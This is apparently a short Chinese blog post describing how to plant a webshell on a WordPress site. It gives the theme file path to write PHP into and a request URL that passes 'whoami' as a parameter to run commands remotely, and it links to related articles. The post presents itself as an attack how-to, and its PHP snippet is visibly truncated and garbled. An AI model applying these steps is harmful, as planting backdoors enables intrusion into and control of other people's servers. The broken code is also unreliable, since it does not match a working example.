wordpress-拿想要的权限

按照我下面这个方式试试，这是我经常用的最简单的方法，wordpress拿shell，一般是在主题和插件上做文章，页面上修改之后，具体路径一般都是固定的，直接访问即可，总体思路就是要么有权限直接在当前页面代码修改或者添加，要么能够新建添加

登录到目标WordPress程序找到路径/wp-content/themes/twentyseventeen/page.php 当然还有其他写webshell代码的位置，只要有权限写入即可，这里只是列举其中之一，写入如下php代码

if (isset(_GET[0]);
}

访问 http://x.x.x.x..x/wp-content/themes/twentyseventeen/page.php?0=whoami 即可远程执行命令

可参考下面两篇文章
https://www.cnblogs.com/ssw6/p/12668000.html
https://cloud.tencent.com/developer/news/378799